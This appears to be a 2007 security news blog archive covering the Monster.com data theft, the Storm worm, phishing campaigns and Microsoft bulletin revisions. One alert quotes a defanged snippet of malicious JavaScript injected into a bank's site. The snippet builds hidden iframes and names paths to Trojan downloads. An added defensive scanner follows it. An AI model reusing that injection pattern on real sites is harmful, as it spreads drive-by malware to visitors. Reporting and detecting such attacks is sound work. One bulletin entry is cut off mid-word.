August 2007 - Posts

Monster Worldwide, the owner of employment search site Monster.com, began notifying this week the estimated 1.3 million users affected by a breach that leaked résumé information and pledged to beef up network monitoring and defenses to prevent such a leak from happening again.

As reported by SecurityFocus, a malicious Trojan-horse program dubbed Infostealer.Monstres accessed résumé data using stolen, but valid, employer credentials and copied the information to a remote server. The information included names, physical and e-mail addresses, and phone numbers. At least one reader of SecurityFocus has claimed to have been notified by Monster that their information had been stolen.

http://www.securityfocus.com/brief/580 

 

Posted Friday, August 31, 2007 1:38 PM by Don | with no comments

Issued: August 29, 2007

Summary

The following bulletins have undergone a minor revision increment.
Please see the appropriate bulletin for more details.

  * MS07-047 - Important
  * MS07-046 - Critical
  * MS07-045 - Critical
  * MS07-044 - Critical

Bulletin Information:

* MS07-047 - Important

  - http://www.microsoft.com/technet/security/bulletin/ms07-047.mspx
  - Reason for Revision: V1.1 (August 29, 2007): Bulletin revised to
    correct Registry Key Verification for Windows Media Player
    7.1, 9, 10, and 11 on supported editions of Windows 2000
    Service Pack 4, Windows Server 2003 Service Pack 1, Windows
    Server 2003 Service Pack 2, Windows XP Service Pack 2 and x64
    Editions.
  - Originally posted: August 14, 2007
  - Updated: August 29, 2007
  - Bulletin Severity Rating: Important
  - Version: 1.1
   
* MS07-046 - Critical

  - http://www.microsoft.com/technet/security/bulletin/ms07-046.mspx
  - Reason for Revision: Bulletin Updated: Additional information has
    been added to include workarounds for this vulnerability.  
  - Originally posted: August 14, 2007
  - Updated: August 29, 2007
  - Bulletin Severity Rating: Critical
  - Version: 1.1
   
* MS07-045 - Critical

  - http://www.microsoft.com/technet/security/bulletin/ms07-045.mspx
  - Reason for Revision: Revised to document the functionality change
    of increasing the limit on cookies from 20 to 50. 
  - Originally posted: August 14, 2007
  - Updated: August 29, 2007
  - Bulletin Severity Rating: Critical
  - Version: 1.2
   
* MS07-044 - Critical

  - http://www.microsoft.com/technet/security/bulletin/ms07-044.mspx
  - Reason for Revision: Bulletin updated to change download link
    display text for Office components in Affected Software table 
  - Originally posted: August 14, 2007
  - Updated: August 29, 2007
  - Bulletin Severit

Websense® Security Labs(TM) has received reports of a new variant of an email attack that was originally launched early this year. The spoofed email purports to be from the Better Business Bureau (BBB). The message claims that a complaint has been filed against the recipient's company.

Previously, the email attack contained an attachment that the victim would need to open in order to become infected. The new variant is slightly different.

The new message uses a tactic employed by other, more-successful email attacks, such as the recent Storm worm. Instead of including an attachment in the email, the body of the email contains a link to an external Web site from which the payload is downloaded if the link is accessed. This method allows the attack to bypass many attachment filters at the email gateway.

Link to our previous BBB alert:
http://www.websense.com/securitylabs/alerts/alert.php?AlertID=777

Details ... 

Symantec Corp. launched new editions of its consumer Norton AntiVirus and Norton Internet Security (NIS) software today, adding new browser defenses for some users in both packages and wrapping features from its new identity initiative into the suite.

The 2008 versions boast several new features and enhancements, including something that Symantec is calling Browser Defender, which is behavioral-based technology that inspects all ActiveX, JavaScript and VBScript code executing within Microsoft Corp.'s Internet Explorer browser.

Continues at computerworld.com 

 

Posted Wednesday, August 29, 2007 7:40 AM by Don | with no comments

Software with fewer bugs is not necessarily less risky to use, according to a recent study conducted by the Honeynet Project.

The study analyzed client-side attacks in the wild using a large list of 300,000 URLs gathered during two weeks in May 2007 by automated virtual machines. Older versions of the three major browsers for Windows -- Microsoft's Internet Explorer 6 SP2, Mozilla's Firefox 1.5.0, and Opera's Opera 8.0.0 -- were each used to browse the same subset, about 10 percent, of the sites. While researchers have disclosed about twice as many vulnerabilities for Firefox 1.5.0 as for Internet Explorer 6 SP2, the Honeynet Project found no attacks against the browser. Microsoft's Web software, however, was compromised nearly 200 times.

http://www.securityfocus.com/brief/578 

The Storm Trojan / Bot continues to spread and is now using a YouTube video to lure users. The latest version has a variety of subjects and email bodies but now uses the filename video.exe.

Email subject example: Sheesh man what are you thinkin.

Upon connecting to the URL, which is referenced as a YouTube link but is actually a Storm IP, the same exploit code used in past attacks attempts to run. As in the past, if users are not vulnerable, they are shown a page that requests they run the code manually.

 Websense Alert

 

A Web site owner has blocked Firefox users from accessing his site in protest of a popular Firefox browser extension that blocks text and display ads.

Firefox users who go to http://jacklewis.net/weblog/ are redirected to Why Firefox is Blocked, which says the Adblock Plus extension undercuts Web sites dependent on advertising revenue.

"Accessing the content while blocking the ads therefore would be no less than stealing," wrote Danny Carlton, a Web site designer and author, who runs both sites. JackLewis.net is his personal blog site; "Jack Lewis" is a pseudonym adopted, according to a Google-cached version of Carlton's site, as a defense against "crazy people."

Full Story at computerworld.com 

 

Posted Friday, August 24, 2007 4:15 AM by Don | with no comments

Attackers are probing for Windows servers running Trend Micro Inc.'s ServerProtect antivirus software, researchers warned.

Early today, Symantec Corp.'s DeepSight threat network monitored a major spike in traffic over TCP port 5168, which is related to the remote procedure call service in ServerProtect. "This may indicate an ongoing mass-scanning and exploitation attempt trying to exploit vulnerable systems for the newly disclosed vulnerabilities," said Symantec analyst Pukhraj Singh in an alert issued to corporate customers.

Continues at computerworld.com 

 

Posted Friday, August 24, 2007 4:11 AM by Don | with no comments

Monster Worldwide, the owner of employment search site Monster.com, warned job seekers late Wednesday that the company had discovered and shut down a rogue database that contained personal information culled from résumés posted on the site.

As reported by SecurityFocus, online fraudsters have used the database to craft personalized e-mails that purport to be a work-at-home job, but in reality are part of a scheme to steal funds from a bank account. The information found on the server included names, addresses, phone numbers and e-mail addresses, the company said.

http://www.securityfocus.com/brief/574 

 

Posted Thursday, August 23, 2007 10:08 AM by Don | with no comments

Issued: August 22, 2007

Summary

The following bulletins have undergone a minor revision increment.
Please see the appropriate bulletin for more details.

  * MS07-045 - Critical
  * MS07-050 - Critical

Bulletin Information:

* MS07-045 - Critical

  - http://www.microsoft.com/technet/security/bulletin/ms07-045.mspx
  - Reason for Revision: Revised to correct Registry Key Verification
    for Internet Explorer 7 for all supported 32-bit editions,
    64-bit editions, and Itanium-based editions of Windows Server 2003. 
  - Originally posted: August 14, 2007
  - Updated: August 22, 2007
  - Bulletin Severity Rating: Critical
  - Version: 1.1
       
* MS07-050 - Critical

  - http://www.microsoft.com/technet/security/bulletin/ms07-050.mspx
  - Reason for Revision: Revised to correct Registry Key Verification
    for Internet Explorer 7 for all supported 32-bit editions,
    64-bit editions, and Itanium-based editions of Windows Server 2003 
  - Originally posted: August 14, 2007
  - Updated: August 22, 2007
  - Bulletin Severity Rating: Critical
  - Version: 1.2

The group responsible for propagating the malicious program commonly known as the Storm Worm changed tactics this week, using e-mail messages masquerading as verification announcements from online Web sites and clubs to lure victims.

http://www.securityfocus.com/brief/573 

Posted Wednesday, August 22, 2007 5:05 AM by Don | with no comments

Employers are increasingly blocking access to Facebook because they're concerned about the time wasted and the information leaked when workers use social networks on company time.

About half of all companies block employee access to Facebook, putting policies and access controls in place to keep workers working and not connecting with their Facebook friends, according to security company Sophos. In a poll of 600 workers, 43% said their company was blocking access to Facebook, while another 7% reported that usage of the Web site was restricted and only those with a specific business requirement were allowed to access it.

Full Story at informationweek.com 

 

Posted Tuesday, August 21, 2007 1:52 PM by Don | with no comments

The 46,000 people reportedly infected by ads on job sites may be only a fraction of the victims of an ambitious, multistage attack that has stolen data belonging to several hundred thousand people who posted resumes on Monster.com, a researcher said this weekend.

According to Symantec security analyst Amado Hidalgo, a new Trojan horse called Infostealer.Monstres by Symantec has stolen more than 1.6 million records belonging to several hundred thousand people from Monster Worldwide's job search service. That data is then used to target the Monster.com users with credible phishing mail that plants more malware on their machines.

Full Story at infoworld.com

Posted Tuesday, August 21, 2007 3:25 AM by Don | with no comments

A security researcher at SecureWorks Inc. has uncovered a cache of financial and personal data that was stolen from about 46,000 individuals by a variant of Prg, a Trojan program gaining notoriety for its quick-change behaviors.

The stolen data includes bank and credit card account information and Social Security numbers as well as usernames and passwords for online accounts. Many of the victims were infected and reinfected as they visited several leading online job search sites, including the popular Monster.com.

Continues at computerworld.com 

 

Posted Friday, August 17, 2007 2:25 PM by Don | with no comments

Websense® Security Labs(TM) has discovered that the official site for Indian Syndicate Bank (www.syndicatebank.in) was compromised with a malicious script that attempts to exploit multiple vulnerabilities. When customers visit the web site, a malicious JavaScript file (e.js) is executed and creates two additional iframes in the page.

<script src=http://< URL REMOVED >/e.js></script>

Snippet of js code:

document.writeln("\/\/xxxx mca By Mr.0wen\/\/");
document.writeln("document.write(unescape(\"%3CIFraMe < URL REMOVED >IFraMe < URL REMOVED >wIdth%3D%220%22%20heIght%3D%220%22%20FraMebOrder %3D%220%22%3E%3C\/IFraMe%3E\"));");
document.writeln("\/\/xxxx mca By Mr.0wen\/\/");

The JavaScript from e.js (seen above) creates two new IFRAME elements within the page. One IFRAME attempts to load exploit code and the other creates several additional IFRAMEs that contain advertisement-related content. The exploit will try to load a Trojan Downloader (qq.exe) which will contact a remote server to download the following Trojan Downloader and Backdoor:

http://< URL REMOVED >/hxw/hx/200512.exe
http://< URL REMOVED >/hxw/hx/dd.exe

The site appears to have been cleaned a few hours ago.
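
A defender-side check for the injection pattern described above, as an added example that is not part of the original alert or any Websense tooling: it peels the backslash and %XX encoding layers and flags zero-size iframes regardless of letter case. The sample string and the example.invalid URL are constructed for illustration.

```javascript
// Constructed sample mirroring the structure of the e.js snippet
// (placeholder URL; String.raw keeps the backslashes literal).
const SAMPLE = String.raw`document.writeln("document.write(unescape(\"%3CIFraMe%20src%3D%22http%3A%2F%2Fexample.invalid%2Fa.htm%22%20wIdth%3D%220%22%20heIght%3D%220%22%20FraMebOrder%3D%220%22%3E%3C\/IFraMe%3E\"));");`;

// Peel one layer: JavaScript backslash escapes, then %XX escapes.
function peelLayer(text) {
  const unslashed = text.replace(/\\(["'\/\\])/g, "$1");
  return unslashed.replace(/%([0-9a-fA-F]{2})/g, (_, hex) =>
    String.fromCharCode(parseInt(hex, 16)));
}

// Decode until the text stops changing, bounded so that crafted
// input cannot keep the scanner looping.
function normalize(source, maxRounds = 5) {
  let current = source;
  for (let i = 0; i < maxRounds; i++) {
    const next = peelLayer(current);
    if (next === current) break;
    current = next;
  }
  return current;
}

// Read one attribute value from a tag, quoted or unquoted, any case.
function attr(tag, name) {
  const re = new RegExp("\\b" + name + "\\s*=\\s*[\"']?([^\"'\\s>]*)", "i");
  const m = re.exec(tag);
  return m ? m[1] : null;
}

// Report every iframe whose width or height is zero after decoding.
function findHiddenIframes(source) {
  const zero = (v) => v !== null && /^0(px|%)?$/i.test(v);
  const findings = [];
  for (const m of normalize(source).matchAll(/<iframe\b[^>]*>/gi)) {
    const width = attr(m[0], "width");
    const height = attr(m[0], "height");
    if (zero(width) || zero(height)) {
      findings.push({ src: attr(m[0], "src"), width, height });
    }
  }
  return findings;
}

console.log(findHiddenIframes(SAMPLE));
```

This is a static triage heuristic for page source and script files; it does not execute the script, so content assembled at run time by other means will not be seen.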
 
Posted Friday, August 17, 2007 2:18 PM by Don | with no comments

Sourcefire, a maker of intrusion detection products, announced on Friday that the company had acquired the intellectual property and copyrights to the open-source antivirus project, ClamAV, from five key developers.

Under the terms of the agreement with ClamAV founder Tomasz Kojm and four other members of the project, Sourcefire acquired the rights and trademarks to the project, the five developers' copyrights and all Web content. Sourcefire, which already owns rights to the open-source Snort intrusion detection system created by company founder Martin Roesch, said it will maintain ClamAV much in the same way as it has done with Snort.

http://www.securityfocus.com/brief/571 

 

Posted Friday, August 17, 2007 9:09 AM by Don | with no comments

The open-source Ubuntu project shut down on Saturday five of eight community-run servers that the group sponsors, after attacks were detected emanating from the computers.

The Ubuntu project, which manages the popular Linux distribution, received reports of the attacks on Monday, August 6, and proceeded to take the servers offline. The servers were running an older version of the Ubuntu Linux operating system, making several software packages vulnerable to known flaws.

http://www.securityfocus.com/brief/570 

Posted Friday, August 17, 2007 7:09 AM by Don | with no comments

Issued: August 15, 2007

Summary

The following bulletins have undergone a minor revision increment.
Please see the appropriate bulletin for more details.

  * MS07-050 - Critical
  * MS07-042 - Critical

Bulletin Information:

* MS07-050 - Critical

  - http://www.microsoft.com/technet/security/bulletin/ms07-050.mspx
  - Reason for Revision: Correct file information for Microsoft
    Internet Explorer 7 for Windows 2003  
  - Originally posted: August 14, 2007
  - Updated: August 15, 2007
  - Bulletin Severity Rating: Critical
  - Version: 1.1
    
* MS07-042 - Critical

  - http://www.microsoft.com/technet/security/bulletin/ms07-042.mspx
  - Reason for Revision: Bulletin Updated: corrected file manifest
    information for Microsoft XML Core Services 4.0.  
  - Originally posted: August 14, 2007
  - Updated: August 15, 2007
  - Bulletin Severity Rating: Critical
  - Version: 1.1

Researchers at McAfee are reporting that they've reproduced a reported zero-day vulnerability in the Yahoo Messenger Webcam.

Karthik Raman, a researcher with McAfee, first reported in a Tuesday blog entry that Chinese researchers were claiming to have found a zero-day bug in Yahoo Messenger. On Wednesday, Raman's fellow McAfee researcher Wei Wang noted in a blog entry that they have been able to reproduce the vulnerability on Messenger V8.1.0.413.

Continues at informationweek.com 

Storm, the Trojan horse that collects PCs into hacker-controlled botnets, roared back into life last month in several waves, security researchers said Monday, and has blown by 2005's Sober to become the most prolific e-mail-borne malware ever.

"This is the biggest since Sober in mid-to-late 2005," said Sam Masiello, director of threat research at MX Logic Inc., referring to a long-lasting worm whose variants struck repeatedly in the second half of 2005, often in extremely high numbers. In November 2006, for instance, e-mail filtering companies reported malware-laden e-mail counts spiking 1,500% in a week, and said they were intercepting four times the usual number of infected messages.

Continues at computerworld.com 

 

Posted Wednesday, August 15, 2007 3:37 AM by Don | with no comments